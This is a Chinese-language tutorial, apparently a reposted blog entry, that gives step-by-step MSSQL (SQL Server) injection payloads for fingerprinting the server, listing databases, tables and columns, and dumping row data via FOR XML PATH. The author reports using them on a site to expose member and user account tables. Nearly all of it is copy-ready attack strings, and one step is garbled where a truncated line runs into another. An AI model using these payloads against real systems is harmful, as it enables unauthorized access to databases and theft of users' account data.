大哥带的MSsql注入(SQL Server)--预习
①判断数据库类型
and exists (select * from sysobjects)--返回正常为mssql(也名sql server)
and exists (select count(*) from sysobjects)--有时上面那个语句不行就试试这个哈
②判断数据库版本
and 1=@@version--这个语句要在有回显的模式下才可以哦
and substring((select
@@version),22,4)='2008'--适用于无回显模式,后面的2008就是数据库版本,返回正常就是2008的复制代码第一条语句执行效果图(类似):第二条语句执行效果图:(如果是2008的话就返回正常)
③获取所有数据库的个数 (一下3条语句可供选择使用)
1. and 1=(select quotename(count(name)) from master..sysdatabases)--
2. and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases) --
3. and 1=(select str(coun、 and 1=(select quotename(count(name)) from master..sysdatabases where dbid>5)--
and 1=(select str(count(name))%2b'|' from master..sysdatabases where dbid>5) --
and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases where dbid>5) --
说明:dbid从1-4的数据库一般为系统数据库.
⑤获取数据库 (该语句是一次性获取全部数据库的,且语句只适合>=2005,两条语句可供选择使用)
and 1=(select quotename(name) from master..sysdatabases FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from master..sysdatabases FOR XML PATH(''))--
⑥获取当前数据库
and db_name()>0
and 1=(select db_name())--
⑦获取当前数据库中的表(有2个语句可供选择使用)【下列语句可一次爆数据库所有表(只限于mssql2005及以上版本)】
and 1=(select quotename(name) from 数据库名..sysobjects where xtype='U' FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from 数据库名..sysobjects where xtype='U'
FOR XML PATH(''))--复制代码测试效果图:得到
3个敏感的表:Whir_Sec_Users/Whir_Mem_Member/Whir_Mem_MemberGroup
⑧获得表里的列
一次爆指定表的所有列(只限于mssql2005及以上版本):
and 1=(select quotename(name) from 数据库名..syscolumns where id =(select
id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))--
and 1=(select '|'%2bname%2b'|' from 数据库名..syscolumns where id =(select
id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))--
效果图:既然有账户信息,我就不管是不是管理员的的了,我帖子的目的不是为了得到管理员的信息,只是为了演示可以通过这个方法来获取相关信息。
⑨获取指定数据库中的表的列的数据库
逐条爆指定表的所有字段的数据(只限于mssql2005及以上版本):
and 1=(select top 1 * from 指定数据库..指定表名 where排除条件 FOR XML PATH(''))--
一次性爆N条所有字段的数据(只限于mssql2005及以上版本):
and 1=(select top N * from 指定数据库..指定表名 FOR XML PATH(''))--复制代码第一条语句:and
1=(select top 1 * from 指定数据库..指定表名 FOR XML
PATH(''))--测试效果图:----------------------------------加上where条件筛选结果出来会更加好,如:where
and name like '%user%' 就会筛选出含有user关键词的出来。用在筛选表段时很不错
最新文章
- EBS 11i 的工作流列表
- Sqoop切分数据的思想概况
- O2O的实时搜索引擎
- System.Data.OleDb.OleDbException: 未指定的错误的解决方法
- ftp 服务器搭建和添加用户和目录
- CentOS7安装Oracle 11g R2 详细过程——零基础
- C++11模板的别名
- WebView点击加载的页面中的按钮时不弹出新窗口以及在加载后执行javascript
- shell脚本操作mysql数据库—创建数据库,在该数据库中创建表(插入,查询,更新,删除操作也可以做)
- android java获取当前时间的总结
- 轻量化ViewControllers,读文章做的总结
- jsonp与cors跨域的一些理解
- Kafka集群在空载情况下Cpu消耗比较高的问题
- spring-oauth-server实践:OAuth2.0 通过header 传递 access_token 验证
- 完美滑动顶部固定ScrollView,合并可以上拉,下拉加载更多
- ruby1.9.2 +windowxp
- 【提示框】【计时事件】【cookie】
- canvas/CSS仪表盘效果
- Visual Studio 2015 msvsmon.exe crashed when c++ debugging with x64
- echart.js组件编写
热门文章
- noip2013day1-货车运输
- 树形DP水题系列(1):FAR-FarmCraft [POI2014][luogu P3574]
- mknod创建设备(加载新的设备驱动时候,通常会用到此命令)
- 解决iframe缓存机制导致页面不清除缓存不刷新页面的bug
- JavaEE--JSP详解
- 官宣!VS Code Python 全新功能在 PyCon China 全球首发!
- Xcode中常用的快捷键(原文链接http://www.cocoachina.com/ios/20141224/10752.html)
- install-info - 更新 info/dir 项
- MATLAB仿真 让波形动起来
- Codeforces Round #575 (Div. 3) B. Odd Sum Segments (构造,数学)